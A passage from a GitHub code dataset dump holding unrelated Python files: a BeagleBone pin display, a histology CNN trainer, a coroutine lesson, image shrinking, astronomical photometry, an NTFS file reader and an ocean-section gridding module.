self.p9_pins[i][0]\n                    p9_right_i_list = self.p9_pins[i+1][0]\n                    p8_left_i_list = self.p8_pins[i][0]\n\n                aux_len = len(\" \".join(p9_left_i_list))\n                if aux_len > p9_left_spaces:\n                    p9_left_spaces = aux_len\n\n                aux_len = len(\" \".join(p9_right_i_list))\n                if aux_len > p9_right_spaces:\n                    p9_right_spaces = aux_len\n\n                aux_len = len(\" \".join(p8_left_i_list))\n                if aux_len > p8_left_spaces:\n                    p8_left_spaces = aux_len\n\n            print(\"\\n\")\n            for i in range(0, PINOUT_ZONE_SIZE, 2):\n                # Filter to pins in filtered_pins\n                if filtered_pins is not None:\n                    p9_left_i_list = [pin for pin in self.p9_pins[i][0] if list_has_element(filtered_pins, pin.lower())]\n                    p9_right_i_list = [pin for pin in self.p9_pins[i+1][0] if list_has_element(filtered_pins, pin.lower())]\n                    p8_left_i_list = [pin for pin in self.p8_pins[i][0] if list_has_element(filtered_pins, pin.lower())]\n                    p8_right_i_list = [pin for pin in self.p8_pins[i+1][0] if list_has_element(filtered_pins, pin.lower())]\n                else:\n                    p9_left_i_list = self.p9_pins[i][0]\n                    p9_right_i_list = self.p9_pins[i+1][0]\n                    p8_left_i_list = self.p8_pins[i][0]\n                    p8_right_i_list = self.p8_pins[i+1][0]\n\n                # Get associated status for each pin\n                p9_left_status = None\n                p9_right_status = None\n                p8_left_status = None\n                p8_right_status = None\n\n                if show_enabled and len(self.enabled_buses) > 0:\n                    p9_left_status = [(pin not in self.enabled_buses) for pin in self.p9_pins[i][1]]\n                    p9_right_status = [(pin not in self.enabled_buses) for pin in self.p9_pins[i+1][1]]\n                    p8_left_status = [(pin not in self.enabled_buses) for pin in self.p8_pins[i][1]]\n                    p8_right_status = [(pin not in self.enabled_buses) for pin in self.p8_pins[i+1][1]]\n\n                p9_left_painted_list = colors.get_painted_list(get_color_function, 
p9_left_i_list, selected_pins_map=p9_left_status)\n                p9_right_painted_list = colors.get_painted_list(get_color_function, p9_right_i_list, selected_pins_map=p9_right_status)\n                p8_left_painted_list = colors.get_painted_list(get_color_function, p8_left_i_list, selected_pins_map=p8_left_status)\n                p8_right_painted_list = colors.get_painted_list(get_color_function, p8_right_i_list, selected_pins_map=p8_right_status)\n\n                \n                print(\" \" * (p9_left_spaces - len(\" \".join(p9_left_i_list))) + \" \" * MARGIN_SHOW + \" \".join(p9_left_painted_list) + \" |\" + \" \" * (3 - len(str(i + 1)) + 1) + f\"{colors.PURPLE}{i+1} -- P9 -- {i+2}{colors.WHITE}\"\n                    + \" \" * (3 - len(str(i+2 + 1)) + 1) + \"| \" + \" \".join(p9_right_painted_list)\n                    + \" \" * MARGIN_SHOW + \" \" * (p9_right_spaces - len(\" \".join(p9_right_i_list))) + \".\"\n                    + \" \" * (p8_left_spaces - len(\" \".join(p8_left_i_list))) + \" \" * MARGIN_SHOW + \" \".join(p8_left_painted_list) + \" |\" + \" \" * (3 - len(str(i + 1)) + 1) + f\"{colors.PURPLE}{i+1} -- P8 -- {i+2}{colors.WHITE}\"\n                    + \" \" * (3 - len(str(i+2 + 1)) + 1) + \"| \" + \" \".join(p8_right_painted_list))\n\n        print(\"\") # New line\n\n    def show_GPIO_ports(self):\n        '''\n        Displays the available GPIO ports.\n        Ports shown in green are activated.\n        Ports shown in red are deactivated.\n        '''\n        \n        # Update pins status\n        self.refresh_gpio_list() # Should I use a decorator function so that the status always gets refreshed?\n\n        self.show_pinout(filtered_pins=[\"gpio\"], show_enabled=True)\n\n        print(\"\")\n    \n\n    def show_AIN_ports(self):\n        '''\n        Display the available analog (AIN) ports.\n        Ports shown in green are activated.\n        '''\n\n        # Update pins status\n        self.refresh_gpio_list()\n\n        print(\"\")","repo_name":"Andresitositoses/BeagleboneAI-utils","sub_path":"src/pinsManager.py","file_name":"pinsManager.py","file_ext":"py","file_size_in_byte":11405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"73710140842","text":"#%%\nfrom __future__ import absolute_import, division, print_function, unicode_literals\nimport tensorflow as tf\nimport os, sys\nimport argparse\nimport numpy as np\nimport uuid\nimport pandas as pd\nimport math\nimport datetime\nimport time\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import train_test_split, KFold\nfrom sklearn.preprocessing import OneHotEncoder\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import multilabel_confusion_matrix\nfrom modelingutils import *\n#from bayes_opt import BayesianOptimization\nfrom tensorflow.keras import datasets, layers, models, regularizers, optimizers\nfrom tensorflow.compat.v1.keras import initializers\nfrom tensorflow.keras.applications.inception_v3 import InceptionV3\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nfrom tensorflow.keras.callbacks import EarlyStopping, TensorBoard, LearningRateScheduler\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import train_test_split, KFold\nfrom sklearn.preprocessing import LabelBinarizer\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.preprocessing import StandardScaler\nimport pathlib\nfrom net_models import *\nfrom net_inception import *\nfrom net_resnet50 import *\nfrom net_biopixel import *\n\ndef load_model(model_name):\n    return tf.keras.models.load_model(model_name,\n           
custom_objects={'LeakyReLU': layers.LeakyReLU}\n ), model_name, 0\n\ndef main(p):\n data_dir = pathlib.Path(p + \"Kather_texture_2016_image_tiles_5000\", 'Kather_texture_2016_image_tiles_5000')\n os.listdir(data_dir)\n\n image_count = len(list(data_dir.glob('*/*.tif')))\n print(image_count)\n\n # Classification labels\n class_names = np.array([item.name for item in data_dir.glob('*') if item.name not in [\".DS_Store\"]]) # \"08_EMPTY\"\n print(class_names)\n\n # Data generators and augmentation\n batch_size = 128\n img_height = 150\n img_width = 150\n input_shape = (img_height, img_width, 3)\n\n # Data augmentation, to increase the generalizability of our classifier, we may first randomly jitter points along the distribution by adding some random values\n # In-place data augmentation or on-the-fly data augmentation https://www.pyimagesearch.com/2019/07/08/keras-imagedatagenerator-and-data-augmentation/\n # Standardization is a data scaling technique that assumes that the distribution of the data is Gaussian and shifts the distribution of the data to have a mean of zero and a standard deviation of one.\n train_datagen = ImageDataGenerator( \n # rescale=1./255,\n rotation_range=45, \n width_shift_range=.15,\n height_shift_range=.15,\n horizontal_flip=True,\n #shear_range=0.2,\n zoom_range=0.5,\n samplewise_center=True, # std & scale\n samplewise_std_normalization=True,\n # validation_split=0.2\n )\n val_datagen = ImageDataGenerator( \n #rescale=1./255, # normalize\n samplewise_center=True, # std & scale\n samplewise_std_normalization=True,\n #validation_split=0.1\n )\n test_datagen = ImageDataGenerator(\n #rescale=1./255, # normalize\n samplewise_center=True, # std & scale\n samplewise_std_normalization=True\n )\n\n # Make df of all images and split on train / test set\n traindf, valdf, testdf = read_split_imagefiles(data_dir, class_names)\n duplicate_checkdf = pd.concat([traindf, valdf, testdf],ignore_index=True).drop_duplicates().reset_index(drop=True)\n if traindf.shape[0] + valdf.shape[0] + testdf.shape[0] != duplicate_checkdf.shape[0]:\n print(\"Duplicates detected! 
{} {} {} {}\".format(traindf.shape[0], valdf.shape[0], testdf.shape[0], duplicate_checkdf.shape[0]))\n\n train_generator = train_datagen.flow_from_dataframe( \n dataframe=traindf,\n directory=data_dir,\n shuffle=True,\n target_size=(img_height, img_width),\n batch_size=batch_size,\n #subset='training', \n class_mode='categorical',\n classes = list(class_names))\n\n validation_generator = val_datagen.flow_from_dataframe(\n dataframe=valdf,\n directory=data_dir,\n shuffle=True,\n target_size=(img_height, img_width),\n batch_size=batch_size,\n #subset='validation', \n class_mode='categorical',\n classes = list(class_names))\n\n test_generator = test_datagen.flow_from_dataframe(\n dataframe=testdf,\n directory=data_dir,\n shuffle=False,\n target_size=(img_height, img_width),\n batch_size=batch_size,\n class_mode='categorical',\n classes = list(class_names))\n\n # Featurewise statistics\n #image_batch, label_batch = next(train_generator)\n #datagen.fit(image_batch)\n #test_datagen.fit(image_batch)\n\n # Inspect a batch\n #image_batch, label_batch = next(train_generator)\n #show_batch(image_batch, label_batch, class_names)\n\n #image_batch, label_batch = next(test_generator)\n #show_batch(image_batch, label_batch, class_names)\n\n print(\"Training samples: \", train_generator.samples)\n print(\"Validation samples: \", validation_generator.samples)\n print(\"Test samples: \", test_generator.samples)\n\n # Train\n #model, model_name, epochs = programtest_model(input_shape, class_names)\n #model, model_name, epochs = inception_model(input_shape, class_names)\n model, model_name, epochs = convolutional_model(input_shape, class_names)\n #model, model_name, epochs = resnet50_model(input_shape, class_names)\n #model, model_name, epochs = biopixel_model(input_shape, class_names)\n #model, model_name, epochs = load_model(\"conv_model-100.h5\")\n model.summary()\n\n #return model, test_generator, class_names\n\n # Setup callbacks\n #es = EarlyStopping(monitor=\"val_loss\", mode=\"min\", verbose=1, patience=100)\n tb = TensorBoard(log_dir='./logs', write_graph=True, write_images=True, update_freq='epoch')\n callbacks=[tb] #,es]\n\n print(\"Train for epochs: \", epochs)\n\n H = model.fit(\n train_generator,\n steps_per_epoch = train_generator.samples // batch_size,\n epochs=epochs,\n validation_data=validation_generator,\n validation_steps = validation_generator.samples // batch_size,\n callbacks=callbacks\n )\n \n model.summary()\n plot_history(H)\n model.save(\"{}-{}.h5\".format(model_name, epochs))\n #model.save(\"./colorectal-histology-mnist/models/{}.h5\".format(model_name))\n\n ## Test model\n test_model(model, test_generator, class_names)\n\n #https://towardsdatascience.com/understanding-your-convolution-network-with-visualizations-a4883441533b\n #https://github.com/anktplwl91/visualizing_convnets/blob/master/model_training_and_visualizations.py\n\n return model, test_generator, class_names\n\n# Run as:\n# floyd run\nif __name__ == \"__main__\":\n # Import images\n p = '/mnist/' #floydhub\n #p = '../../colorectal-histology-mnist/' #local\n #p = './colorectal-histology-mnist/data/' #cloud\n model, test_generator, class_names = main(p)\n\n #Tasks: inspect a batch, train a model, test a model, apply a model (class activation)\n\n\n\n\n# %%\n","repo_name":"martinlie/iti43210_project2","sub_path":"modeling/convolutional_nets.py","file_name":"convolutional_nets.py","file_ext":"py","file_size_in_byte":7162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} 
+{"seq_id":"11496898885","text":"# Корутины генератопы которые из вне получают данные\n# from inspect import getgeneratorstate, библиотека, чтобы посмотреть в каком состояние генератор.\n# throw(StopIteration)\n# average() - создаст объект генератора\n# coroutine - декоратор для инициализации генератора\n# генераторы и корутины могут иметь return и возвращать некое значение.\n\n\ndef coroutine(func):\n def inner(*args, **kwargs):\n g = func(*args, **kwargs)\n g.send(None)\n return g\n return inner\n\n\ndef subgen():\n x = 'Ready to acept message'\n message = yield x\n print('Subgen received', message)\n\n\nclass BlaBlaException(Exception):\n pass\n\n\n@coroutine\ndef average():\n count = 0\n summ = 0\n average = None\n\n while True:\n try:\n x = yield average\n except StopIteration:\n print('Done')\n break\n except BlaBlaException:\n print('------------------------------')\n break\n else:\n count += 1\n summ += x\n average = round(summ/count)\n return average","repo_name":"kmv1712/lesson_on_asynchrony_from_oleg_molchanov","sub_path":"5_coroutines.py","file_name":"5_coroutines.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"41414947148","text":"\"\"\"\r\nFile: shrink.py\r\nName: Jasmin Hsu\r\n-------------------------------\r\nCreate a new \"out\" image half the width and height of the original.\r\nSet pixels at x=0 1 2 3 in out , from x=0 2 4 6 in original,\r\nand likewise in the y direction.\r\n\"\"\"\r\n\r\nfrom simpleimage import SimpleImage\r\n\r\n\r\ndef shrink(filename):\r\n \"\"\"\r\n :param filename: str, the file path of the original image\r\n :return img: SimpleImage, the image with 1/2 original width and height\r\n \"\"\"\r\n img = SimpleImage(filename)\r\n b_img = SimpleImage.blank(img.width//2, img.height//2)\r\n for x in range(img.width):\r\n for y in range(img.height):\r\n if x % 2 == 0 and y % 2 == 0 or x == y == 0: # Only use even pixels\r\n pixel_img = img.get_pixel(x, y)\r\n pixel_b_img = b_img.get_pixel(x/2, y/2)\r\n pixel_b_img.red = pixel_img.red\r\n pixel_b_img.blue = pixel_img.blue\r\n pixel_b_img.green = pixel_img.green\r\n\r\n return b_img\r\n\r\n\r\ndef main():\r\n \"\"\"\r\n This program will shrink the original image proportionally\r\n \"\"\"\r\n original = SimpleImage(\"images/poppy.png\")\r\n original.show()\r\n after_shrink = shrink(\"images/poppy.png\")\r\n after_shrink.show()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"JasminHsu/StanCode-Projects","sub_path":"stanCode-projects/photoshop/shrink.py","file_name":"shrink.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"6836861244","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Feb 23 11:55:09 2021\r\n\r\n@author: 55119\r\n\"\"\"\r\n\r\nimport os\r\nimport shutil\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom astropy.table import QTable\r\nfrom astropy.table import Table\r\nimport matplotlib.pyplot as plt\r\nfrom astropy.io import fits\r\nimport astropy.units as u\r\nfrom photutils import CircularAperture\r\nfrom photutils import aperture_photometry\r\nfrom photutils.datasets import make_100gaussians_image\r\nfrom photutils import CircularAperture, CircularAnnulus\r\nimport context\r\n\r\ndata_dir = os.path.join(context.data_dir, \"FCC_halpha\")\r\ngalaxies = sorted(os.listdir(data_dir))\r\nfor galaxy in galaxies:\r\n print(galaxy)\r\n wdir = 
os.path.join(data_dir, galaxy)\r\n    os.chdir(wdir)\r\n    try:\r\n        cubename = [x for x in os.listdir(wdir) if x.endswith(\"pix.fits\")][0]\r\n    except IndexError:\r\n        shutil.rmtree(wdir)\r\n        continue\r\n    # Loading data\r\n    data = fits.getdata(cubename, ext=1)\r\n    t = Table.read(cubename)\r\n    t['FILTER'].tolist()\r\n    idx = t['FILTER'].tolist().index('R')\r\n    rband = data[idx, :, : ]\r\n    #Creating Aperture Objects\r\n    positions = np.array([0.5 * rband.shape[0], 0.5 * rband.shape[1]])\r\n    radii = np.linspace(1, rband.shape[0] / 2., 30)\r\n    # apertures = [CircularAperture(positions, r=r) for r in radii]\r\n    apertures = []\r\n    plt.subplot(1,2,1)\r\n    vmin = np.percentile(rband, 10)\r\n    vmax = np.percentile(rband, 95)\r\n    plt.imshow(rband, vmin=vmin, vmax=vmax)\r\n    for r in radii:\r\n        aperture = CircularAperture(positions, r=r)\r\n        apertures.append(aperture)\r\n        aperture.plot(color='r', lw=1)\r\n    plt.subplot(1,2,2)\r\n    # Put the mask code here\r\n    ###\r\n    ###\r\n    mask = np.zeros_like(rband)\r\n    # Performing Aperture Photometry\r\n    phot_table = aperture_photometry(rband, apertures, mask=mask)\r\n    # Reading the values from the table\r\n    phot = [float(phot_table[\"aperture_sum_{}\".format(i)]) for i in range(30)]\r\n    table = Table([radii, phot], names=[\"r\", \"photsum\"])\r\n    table.write(\"photometry_R.fits\", overwrite=True)\r\n    plt.plot(radii, phot, \"o\")\r\n    plt.savefig('CUBE_FOTOMETRIA_R.png')\r\n    plt.show()\r\n    \r\n    # #Multiple Apertures at Each Position\r\n    # radii = [3., 4., 5.]\r\n    # apertures = [CircularAperture(positions, r=r) for r in radii]\r\n    # phot_table = aperture_photometry(data, apertures)\r\n    # for col in phot_table.colnames:\r\n    #     phot_table[col].info.format = '%.8g'\r\n\r\n    #Sigma-clipped median within a circular annulus\r\n    # data = make_100gaussians_image()\r\n    # positions = [(145.1, 168.3), (84.5, 224.1), (48.3, 200.3)]\r\n    # aperture = CircularAperture(positions, r=5)\r\n    # annulus_aperture = CircularAnnulus(positions, r_in=10, r_out=15)\r\n    # annulus_masks = annulus_aperture.to_mask(method='center')\r\n    \r\n    # plt.imshow(annulus_masks[0], interpolation='nearest')\r\n    # plt.colorbar()","repo_name":"cebarbosa/splus-halpha","sub_path":"test_fotometria.py","file_name":"test_fotometria.py","file_ext":"py","file_size_in_byte":2903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"23654025866","text":"\nfrom ntfs import open_ntfs_file\n\n\ndef main(volume_drive: str, file_name: str) -> None:\n    with open_ntfs_file(volume_drive, file_name) as ntfs_file:\n        print(ntfs_file.read())\n\n\nif __name__ == \"__main__\":\n    from logging import DEBUG, INFO, WARNING, ERROR\n    from argparse import ArgumentParser\n\n    from ntfs.utils import set_ntfs_log_level\n\n    parser = ArgumentParser(\n        description='Parse ntfs to retrieve a file\\'s content')\n    parser.add_argument('volume_letter')\n    parser.add_argument('file_name')\n    parser.add_argument('-v', '--verbose', action='count')\n    args = parser.parse_args()\n\n    log_level = {1: WARNING, 2: INFO, 3: DEBUG}.get(args.verbose, ERROR)\n    set_ntfs_log_level(log_level)\n\n    main(args.volume_letter, args.file_name)\n","repo_name":"dan1994/ntfs_parser","sub_path":"ntfs_parser.py","file_name":"ntfs_parser.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"74539798443","text":"\"\"\" Module for the manipulation of section endpoints and gridded section \"\"\"\n\nimport numpy as np\nimport pylab as plt\ntry:\n    from param import ee\nexcept ImportError:\n    from pypago.sample_param import ee\nimport pypago.toolsec as toolsec\nfrom pypago.disp import PypagoErrors\nimport pypago.misc\n\n\nclass Section(object):\n\n    \"\"\" Section endpoint object. 
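An illustrative construction (the endpoint\n    values here are made up, not taken from any real configuration):\n    Section('A25', lon=[-43.0, -9.5], lat=[60.6, 43.5], dire=['NW'])\n    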
\"\"\"\n\n def __init__(self, name, lon, lat, dire):\n\n \"\"\"\n\n :param str name: Name of the section\n :param numpy.array lon: Section endpoints longitudes\n :param numpy.array lat: Section endpoints latitudes\n :param numpy.array dire: Section segments directions\n\n \"\"\"\n self.name = name\n self.lat = np.array(lat)\n self.lon = np.array(lon)\n self.dire = np.array(dire)\n\n def __str__(self):\n\n \"\"\" Redefinition of the string function \"\"\"\n\n output = 'Section %s\\n' % self.name\n output += ' -lon: %s\\n' % self.lon\n output += ' -lat: %s\\n' % self.lat\n output += ' -dire: %s\\n' % self.dire\n return output\n\n\n# @property\n# def name(self):\n# \"\"\" Section name \"\"\"\n# return self.__name\n#\n# @property\n# def lon(self):\n# \"\"\" Section endpoints longitude \"\"\"\n# return self.__lon\n#\n# @property\n# def lat(self):\n# \"\"\" Section endpoints latitude \"\"\"\n# return self.__lat\n#\n# @property\n# def dire(self):\n# \"\"\" Section segments direction \"\"\"\n# return self.__dire\n#\n# @name.setter\n# def name(self, name):\n# '''\n# name setter\n# :param str name: Section name\n# '''\n# self.__name = np.array(name)\n#\n# @lon.setter\n# def lon(self, lon):\n# '''\n# lon setter\n# :param str lon: Section lon\n# '''\n# self.__lon = np.array(lon)\n#\n# @lat.setter\n# def lat(self, lat):\n# '''\n# lat setter\n# :param str lat: Section lat\n# '''\n# self.__lat = np.array(lat)\n#\n# @dire.setter\n# def dire(self, dire):\n# '''\n# dire setter\n# :param str dire: Section dire\n# '''\n# self.__dire = np.array(dire)\n\n\nclass GridSection(object):\n\n \"\"\" Gridded section object \"\"\"\n\n def __init__(self, grid, section):\n\n \"\"\"\n\n :param pypago.grid.Grid grid: Model grid\n :param list section: List of :py:class:`pypago.sections.Section` objects\n\n \"\"\"\n\n self.name = None\n self.modelname = None\n self.i = None\n self.j = None\n self.dire = None\n self.faces = None\n self.orient = None\n self.lengthvect = None\n self.areavect = None\n self.depthvect = None\n self.lvect = None\n self.veci = None\n self.vecj = None\n\n if grid is None:\n self.jmin = None\n self.jmax = None\n self.imin = None\n self.imax = None\n self.nlon = None\n\n elif (grid is not None) and (section is not None):\n self.jmin = grid.jmin\n self.jmax = grid.jmax\n self.imin = grid.imin\n self.imax = grid.imax\n self.nlon = grid.nlon\n self.modelname = grid.modelname\n\n self._initsection(grid, section)\n if self.name is not None:\n # It the initsection worked (name is not None) then we\n # finalise the section\n self._finalisesection(grid)\n else:\n message = 'The grid and section arguments must BOTH be'\n message += 'None or not None. This is not '\n message += 'the case.'\n raise PypagoErrors(message)\n\n def __str__(self):\n\n \"\"\" Redefinition of the str function \"\"\"\n\n output = 'Gridded section, %s model:\\n' % self.modelname\n\n attrnames = pypago.misc.extract_attrlist(self)\n output += pypago.misc.extract_str(attrnames, self)\n\n return output\n\n def _initsection(self, grid, section):\n\n \"\"\"\n Function which allows to initialise the model sections from the\n sections' endpoints, the model longitude and latitudes.\n The index of the sections which are out of the domain\n (should not be further processed)\n are stored in a list. 
If the section is in the domain, the i,j\n indexes of its\n endpoints and the directions of the segments are stored in a\n |pypago| object.\n\n :param list sections: list of |pypago| objects\n that contains the sections' endpoints\n :param numpy.array lont: longitude of the model subdomain\n :param numpy.array latt: latitude of the model subdomain\n :return: a list (`index_badsec`) that contains the indexes of\n the bad sections and a list (`goodsec`) that contains\n the |pypago| objects of the good sections, containing the section\n endpoints locations in the model grid\n\n \"\"\"\n\n # We try to use the locingrid function.\n # If failed, we append the index of the section to the bad section index list\n try:\n [vecj, veci] = toolsec.locingrid(section.lon,\n section.lat,\n grid.lont,\n grid.latt)\n dire = section.dire\n\n if veci[-1] < veci[0]:\n veci = veci[::-1]\n vecj = vecj[::-1]\n dire = dire[::-1]\n\n self.i = veci\n self.j = vecj\n self.dire = dire\n self.name = section.name\n\n except IOError:\n pass\n\n def _finalisesection(self, grid):\n\n \"\"\"\n Function that performs the computation of section staircases.\n The `sections` arguments are the good sections which have been\n returned by the :py:func:`pypago.sec.initsections`.\n It creates a list of |pypago| objects, each containing the sections'\n properties (`areavect`, `veci`, `vecj`, `depthvect`, `lvect`, etc)\n\n :param list sections: list of the good sections, obtained by the\n :py:func:`pypago.sec.initsections` function\n\n :param pago_obj grid: Pago\n object that contains all the model attributes (area, depthvect,\n scale factor, etc...)\n\n \"\"\"\n\n [vecj, veci] = toolsec.secingrid(self.i[0], self.j[0],\n self.i[1], self.j[1])\n\n [faces, newveci, newvecj, orientation] = toolsec.facesinsec(veci, vecj,\n self.dire[0])\n\n self.veci = newveci\n self.vecj = newvecj\n self.faces = faces\n self.orient = orientation\n\n nl1 = np.floor(len(newveci)/2.)\n if len(self.i) > 2:\n for l in range(2, len(self.i)):\n [vecj, veci] = toolsec.secingrid(self.i[l-1], self.j[l-1],\n self.i[l], self.j[l])\n\n [faces, newveci, newvecj, orientation] = toolsec.facesinsec(veci, vecj, self.dire[l-1])\n\n [finalfaces, finalveci, finalvecj, finalorient] = toolsec.consec(self.veci, self.vecj, self.faces,\n self.orient, newveci, newvecj,\n faces, orientation)\n\n self.veci = finalveci\n self.vecj = finalvecj\n self.faces = finalfaces\n self.orient = finalorient\n nl2 = np.floor(len(newveci)/2.)\n\n # in case section is closed\n if (self.veci[0] == self.veci[-1]) & (self.vecj[0] == self.vecj[-1]):\n\n [finalfaces, finalveci, finalvecj, finalorient] = \\\n toolsec.consec(self.veci[-nl2-1:], self.vecj[-nl2-1:],\n self.faces[-nl2-1:], self.orient[-nl2:-1],\n self.veci[:nl1], self.vecj[:nl1],\n self.faces[:nl1], self.orient[:nl1])\n\n self.veci = np.append(self.veci[nl1:-nl2-1], finalveci)\n self.vecj = np.append(self.vecj[nl1:-nl2-1], finalvecj)\n self.faces = np.append(self.faces[nl1:-nl2-1], finalfaces)\n self.orient = np.append(self.orient[nl1:-nl2-1], finalorient)\n\n self.lengthvect = toolsec.lengthinsec(self.veci, self.vecj, self.faces,\n grid.dyw, grid.dxn)\n\n # if 'e3t_ps' in grid.__dict__.keys():\n # self.depthvect = _depthinsec_e3tps(self.veci, self.vecj,\n # self.faces, grid)\n # self.areavect = self.depthvect*np.tile(np.transpose(self.lengthvect[:, np.newaxis]), (grid.areaW.shape[0], 1))\n # else:\n self.areavect = toolsec.areainsec(self.veci, self.vecj, self.faces,\n grid.areaw, grid.arean)\n self.depthvect = toolsec.areainsec(self.veci, 
self.vecj, self.faces,\n grid.dzw, grid.dzn)\n\n nl = len(np.nonzero(self.veci == self.veci)[0])\n [vecj, veci] = toolsec.nodouble(self.veci[:nl], self.vecj[:nl])\n self.lvect = np.atleast_1d([0])\n for l in range(1, len(veci)):\n self.lvect = np.append(self.lvect, self.lvect[l-1] +\n toolsec.distance(grid.latt[vecj[l], veci[l]], grid.lont[vecj[l], veci[l]],\n grid.latt[vecj[l-1], veci[l-1]], grid.lont[vecj[l-1], veci[l-1]], ee))\n\n def plotsecfaces(self, axes=None, **kwargs):\n\n \"\"\"\n\n Draws a gridded section as 'staircase',\n with grid points as the x and y coordinates.\n\n Should be plotted on a map background that shows\n the `mask` variables. Must be used to check whether\n the all the dots associated with one section are on the same side\n of the line\n\n :param matplotlib.axes.Axes axes: The\n :py:class:`matplotlib axes ` instance\n where to draw the lines\n\n :param dict kwargs: Additional arguments to the plot function\n :return: The color of the line\n :rtype: list|str|unicode\n\n \"\"\"\n\n if axes is None:\n axes = plt.gca()\n\n lw = 1\n cpt = 1\n\n for indl in range(0, len(self.veci)):\n\n if self.faces[indl] == 'N':\n if cpt:\n lll = axes.plot([self.veci[indl]-.5, self.veci[indl]+.5],\n [self.vecj[indl]+.5, self.vecj[indl]+.5], **kwargs)\n col = lll[0].get_color()\n cpt = 0\n else:\n lll = axes.plot([self.veci[indl]-.5, self.veci[indl]+.5],\n [self.vecj[indl]+.5, self.vecj[indl]+.5],\n color=col)\n\n if self.orient[indl] == 1:\n axes.scatter(self.veci[indl], self.vecj[indl]+.75,\n lw, marker='.', color=col)\n else:\n axes.scatter(self.veci[indl], self.vecj[indl]+.25,\n lw, marker='.', color=col)\n\n else:\n if cpt:\n lll = axes.plot([self.veci[indl]-.5, self.veci[indl]-.5],\n [self.vecj[indl]-.5, self.vecj[indl]+.5], **kwargs)\n col = lll[0].get_color()\n cpt = 0\n else:\n lll = axes.plot([self.veci[indl]-.5, self.veci[indl]-.5],\n [self.vecj[indl]-.5, self.vecj[indl]+.5],\n color=col)\n\n if self.orient[indl] == 1:\n axes.scatter(self.veci[indl]-.25, self.vecj[indl],\n lw, marker='.', color=col)\n else:\n axes.scatter(self.veci[indl]-.75, self.vecj[indl],\n lw, marker='.', color=col)\n\n axes.text(np.mean(self.veci), np.mean(self.vecj), self.name, color=col)\n\n return col\n\n\ndef extract_grid_sections(grid, sectionslist):\n\n \"\"\"\n Extract a list of GridSection objects from a grid\n object (containing coordinates and scale factors) and\n a list of section endpoints.\n\n :param pypago.grid.Grid grid: Input\n grid containing the coordinates, mask and scale factors.\n\n :param list sectionslist: List of pypago.sections.Section\n objects, containing section endpoints definitions.\n\n :return: A tuple containing the section in the model world\n (pypago.sections.GridSection objects) and the indexes of\n the discarded sections (i.e. sections out of the domain)\n\n \"\"\"\n\n # if the input is a section, converion into a list\n if isinstance(sectionslist, Section):\n sectionslist = [sectionslist]\n\n if not isinstance(sectionslist, list):\n message = 'The sectionslist argument must either be a single or a list of '\n message += 'pypago.sections.Section objects. 
This program will '\n message += 'be stopped.'\n raise PypagoErrors(message)\n\n output = []\n badsection = []\n for secind in range(0, len(sectionslist)):\n gridsec = GridSection(grid, sectionslist[secind])\n if gridsec.name is not None:\n output.append(gridsec)\n else:\n badsection.append(secind)\n\n return output, badsection\n\n\ndef correct_gridsec(gridsec, secname, offset, position):\n\n \"\"\"\n Function that allows to correct section staircases.\n Especially useful in order to correct sections' junctions. It extracts\n the section variables (`veci`, `vecj`, etc) along\n the length coordinates, from `offset` to `end` or from\n `start` to `offset`, depending on the value of `position` argument.\n\n :param list sec: section list that contains the |pypago|\n objects, containing the veci, vecj, vect, ... obtained\n from the :py:func:`pypago.pypago_sec.finalisesections`\n\n :param type secname: section points to correct\n\n :param int offset: number of points to remove\n\n :param str position: {'start','end'}\n whether we remove the first (position='start')\n or last (position='end') points.\n\n .. warning::\n\n The input list is modified\n\n \"\"\"\n\n nw = pypago.misc.findsecnum(gridsec, secname)\n\n if position == 'end':\n\n gridsec[nw].veci = gridsec[nw].veci[:-offset]\n gridsec[nw].vecj = gridsec[nw].vecj[:-offset]\n gridsec[nw].faces = gridsec[nw].faces[:-offset]\n gridsec[nw].orient = gridsec[nw].orient[:-offset]\n gridsec[nw].areavect = gridsec[nw].areavect[:, :-offset]\n gridsec[nw].depthvect = gridsec[nw].depthvect[:, :-offset]\n gridsec[nw].lvect = gridsec[nw].lvect[:-offset]\n gridsec[nw].lengthvect = gridsec[nw].lengthvect[:-offset]\n\n else:\n gridsec[nw].veci = gridsec[nw].veci[offset:]\n gridsec[nw].vecj = gridsec[nw].vecj[offset:]\n gridsec[nw].faces = gridsec[nw].faces[offset:]\n gridsec[nw].orient = gridsec[nw].orient[offset:]\n gridsec[nw].areavect = gridsec[nw].areavect[:, offset:]\n gridsec[nw].depthvect = gridsec[nw].depthvect[:, offset:]\n gridsec[nw].lvect = gridsec[nw].lvect[offset:]\n gridsec[nw].lengthvect = gridsec[nw].lengthvect[offset:]\n\n return gridsec\n","repo_name":"barriern/PyPago","sub_path":"pypago/sections.py","file_name":"sections.py","file_ext":"py","file_size_in_byte":15489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"23654025866","text":"\nfrom ntfs import open_ntfs_file\n\n\ndef main(volume_drive: str, file_name: str) -> None:\n with open_ntfs_file(volume_drive, file_name) as ntfs_file:\n print(ntfs_file.read())\n\n\nif __name__ == \"__main__\":\n from logging import DEBUG, INFO, WARNING, ERROR\n from argparse import ArgumentParser\n\n from ntfs.utils import set_ntfs_log_level\n\n parser = ArgumentParser(\n description='Parse ntfs to retrieve a file\\'s content')\n parser.add_argument('volume_letter')\n parser.add_argument('file_name')\n parser.add_argument('-v', '--verbose', 